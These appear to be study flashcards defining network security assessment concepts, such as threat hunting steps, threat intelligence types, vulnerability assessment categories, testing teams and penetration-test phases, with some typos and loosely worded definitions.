Network Security Assessment Flashcards
Describe the Steps of Threat Hunting:
1) Hypothesis
2) Collect and process
3) Trigger
4) Investigation
5) Response
1) Make assumptions using TTPs.
2) Collect and analyze data using threat intelligence.
3) Threat-detection tolls trigger anomaly.
4) Investigate and eliminate identified threats.
5) Generate a report for future detection.
What is Cyber Threat Intelligence (CTI)?
The collection and analysis of information about threats and adversaries for the preparedness, prevention, and response against cyber-attacks.
Describe these types of Threat Intelligence:
1) Strategic
2) Tactical
3) Operational
4) Technical
1) High-level information on changing risks.
2) Information on attacker’s TTPs
3) Information on specific incoming attacks.
4) Information on specific indicators of compromise.
Describe these Threat Intelligence Sources:
1) OSINT
2) HUMINT
3) SIGINT
4) TECHINT
5) SOCMINT
6) CCI
1) Informaiton collected from publicly available sources.
2) Information collected from interpersonal contacts.
3) Information collected by intercepting signals.
4) Information collected from adversay’s equipment.
5) Information collected from social media sites.
6) Information collected from established security infrastructure.
Describe the following:
1) Surface Web
2) Deep Web
3) Dark Web
1) Web pages and content that are stored on normal browsers.
2) Web pages and content that are hidden and unindexed from traditional browsers and search engines.
3) Subset of deep web where anyone can navigate anonymously without being traced.
What is Vulnerability Assessment?
is the in-depth examination of a system or application to withstand exploitation.
Describe these types of scanning:
1) Active Scanning
2) Passive Scanning
1) Attacker interacts directly with the target network to find vulnerabilities. Attacks send probes/packets to network.
2) Attack finds vulnerabilties without direct contact with the network. Attacker guesses details by observing TCP connection.
Describe these types of Vulnerability Assessments:
1) Active
2) Passive
3) External
4) Internal
1) Uses a network scanner to find hosts, networks, services and vulnerabilities.
2) Sniffs network traffic to discover host, networks, services and vulnerabilities.
3) Assess the network from a hacker’s perspective, from the outside world.
4) Scans the internal infrastructure to discover exploits and vulnerabilties.
Describe these types of Vulnerability Assessments:
1) Host-based
2) Network-based
3) Application
4) Database
1) Conducts a configuration-level check to evaluate the possibility of compromise.
2) Determines network security attacks that may occur.
3) Tests the web infrastructure for known vulnerabilities.
4) Focuses on testing databases.
Describe these types of Vulnerability Assessments:
1) Wireless Network
2) Credentialed
3) Manual
4) Distrubuted
5) Non-Credentialed
6) Automated
1) Determines vulnerabilities on wireless networks.
2) Assesses the network by obtaining all credentials present in the network.
3) Manually assessing the vulnerabilities, ranking, and score.
4) Assesses the organizations distrubted assets like client-server apps.
5) Assesses the network without any credentials.
6) Automated tools are used to assess vulnerabilities.
What are the six steps of the Vulnerability-Management Life Cycle?
1) Identify assets and create a baseline.
2) Vulnerability Scan
3) Risk Assessment
4) Remediate
5) Verification
6) Monitor
Describe the following:
1) Security Audit
2) Vulnerability Assessment
3) Penetration Testing
1) Checks whether an organization follows a set of security policies and procedures.
2) Discovers the vulnerabilities in an information system.
3) Methodical approach that covers both Security Audit and Vulnerability Asessment.
Describe the following teams:
1) Blue Team
2) Red Team
3) Purple Team
4) White Team
1) Detect and mitigate attackers activities.
2) Detect network and system vulnerabilities from the attacker’s perspective.
3) Comprised of both the blue and red teams.
4) Acts a negotiator between blue and red teams, does not perform any tests, only monitors.
Describe the following:
1) Black Box
2) White Box
3) Grey Box
1) The tester has no knowledge if the system.
2) The tester has all knowledge of the system.
3) The tester has partial knowledge of the system.
What’s invloved in these phases of Penetration Testing:
1) Pre-Attack
2) Attack
3) Post-Attack
1) Research (Information Gathering)
2) Testing/Exploitation
3) Documentation and Reporting